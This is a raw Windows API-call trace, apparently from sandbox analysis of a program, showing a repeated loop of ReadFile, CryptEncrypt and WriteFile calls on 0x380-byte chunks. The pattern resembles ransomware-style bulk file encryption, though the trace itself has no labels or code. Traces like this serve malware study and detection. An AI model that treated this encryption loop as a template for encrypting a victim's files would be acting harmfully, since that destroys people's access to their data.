[0244.394] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.394] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.394] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.394] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.394] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.394] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.395] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.395] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.395] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.395] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.395] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.395] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.395] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.395] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.395] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.395] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.395] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.395] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.396] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.396] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.396] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.396] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.396] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.396] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.396] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.396] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.396] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.396] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.396] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.396] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.396] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.396] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.397] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.397] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.397] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.397] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.397] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.397] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.397] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.397] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.397] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.397] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.397] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.397] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.397] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.398] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.398] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.398] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.398] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.398] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.398] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.398] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.398] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.398] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.398] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.398] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.398] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.398] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.398] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.399] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.399] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.399] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.399] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.399] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.399] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.399] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.399] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.399] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.399] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.399] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.399] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.400] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.400] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.400] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.400] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.400] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.400] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.400] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.400] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.400] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.400] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.400] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.400] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.400] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.401] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.401] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.401] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.401] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.401] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.401] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.401] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.401] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.401] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.401] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.401] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.401] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.401] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0244.401] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.402] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0244.402] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, 